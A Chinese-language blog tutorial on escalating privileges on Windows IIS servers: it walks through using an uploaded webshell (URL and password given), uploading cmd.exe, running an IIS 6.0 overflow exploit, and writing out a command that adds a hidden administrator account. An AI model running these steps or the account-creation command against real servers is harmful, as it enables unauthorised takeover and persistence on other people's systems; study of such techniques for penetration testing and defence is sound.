欢迎来到【血梦博客】 今天是:2020年08月09日 星期日
站长联系QQ:635948183
当前位置: 网站首页> 提权教程> 提权教程:windows系统溢出提权

提权教程:windows系统溢出提权

作者:血梦 日期:2020-03-17 浏览:101分类: 提权教程 已提交百度收录

1、简介


window 服务器 常用的是win2003 win2008 win2012

在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用

户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大

范围测试。

 

2、程序权限的对比

 

在iis里面 权限依次的大小对比

aspx->php=>asp

aspx默认能执行终端命令

php和asp 如果不能执行命令,在组件没有删除的情况下,可以上传cmd到可执行目录、执行命令 均可以执行终端命令。

执行命令的组件

wscript.shell √ 命令行执行组件,显示

 

3、 溢出过程


1在webshell中能执行终端命令


2上传溢出exp


3执行命令

 

4、实战


在iis里面默认上传的大小是200k 大于就会报错。

webshell
http://www.demoasp.com/sb.asp 密码F4ck


查看组件是否删除

 1559890706824445.jpg


查看目录是否可写 可写则上传cmd.exe 执行命令

1559890733119279.jpg

上传溢出工具 ii6.0溢出工具执行

1559890809241838.jpg

 

当前的权限就是system用户


增加用户命令

C:\RECYCLER\iis6.0.exe"net user moonsec moonsec /add & net localgroup administrators moonsec/add"

 

1559890901966493.png

 

登录服务器

1559890932509539.png

关灯